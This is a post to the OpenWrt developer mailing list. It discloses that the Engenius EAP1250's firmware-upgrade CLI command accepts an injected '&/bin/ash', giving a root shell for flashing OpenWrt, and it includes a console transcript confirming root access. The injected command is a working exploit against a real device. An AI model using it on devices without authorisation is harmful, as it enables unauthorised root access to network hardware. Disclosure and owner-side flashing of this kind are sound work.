> Okay .. Engenius problem sorted for the most part, and this works on FWIW I found an easier way and this may a (minor) security issue that exists in other versions, didn't really check. The "fwup" command accepts the '&' characters that's a common URL argument, but it accepts it unbounded.
Thus, be if for breaking into something so you can flash it (my use case) or breaking out of the CLI otherwise (whereby now it's no longer a 'feature' as before) All one need do for a root shell in the CLI "jail" .. is "mgmt" -> "fwgrade" -> "fwup &/bin/ash" >From here you simply curl your firmware into /tmp and mtd write it (double check your board revision for the correct FDT, although naturally I've already made that mistake and all that it breaks is the radios, you can still telnet in and fix it without getting a chair and paperclip) Run thorough of exactly that: --snip-- eap1250/mgmt/fwgrade>fwup &/bin/ash Device reload firmware... Please wait and try to reconnect later. BusyBox v1.19.4 (2018-08-29 16:14:58 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. ~ # Upgrade failed. ~ # id uid=0(root) gid=0(root) ~ # uname -a Linux EAP1250 3.14.43 #1 SMP PREEMPT Wed Aug 29 16:35:59 CST 2018 armv7l GNU/Linux Cheers, Michael Holstein CISSP moholstein(at)gmail(dot)com _______________________________________________ openwrt-devel mailing list openwrt-devel@lists.openwrt.org https://lists.openwrt.org/mailman/listinfo/openwrt-devel
